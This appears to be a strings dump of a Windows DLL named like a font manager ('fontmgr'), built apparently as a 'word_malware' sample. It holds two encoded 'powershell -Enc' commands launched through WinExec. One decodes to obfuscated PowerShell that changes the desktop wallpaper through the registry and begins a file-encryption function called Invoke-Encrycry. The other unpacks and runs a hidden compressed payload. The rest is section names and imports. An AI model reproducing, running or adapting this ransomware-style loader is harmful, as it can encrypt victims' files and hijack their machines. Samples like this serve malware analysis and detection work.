!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsAC
AAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKA
AnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AG
AATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJw
ByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACg
B1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAew
A9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIA
powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUA
RSDSbzm
D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
WinExec
KERNEL32.dll
__std_type_info_destroy_list
memset
_except_handler4_common
VCRUNTIME140.dll
_initterm
_initterm_e
_seh_filter_dll
_configure_narrow_argv
_initialize_narrow_environment
_initialize_onexit_table
_execute_onexit_table
_cexit
api-ms-win-crt-runtime-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
</assembly>
0%0^0~0
2*2/2H2M2Z2
45%5+51575=5D5K5R5Y5`5g5n5v5~5
6!6*676M6
7!8T8z8
<-=6=?=M=V=x=
T?X?`?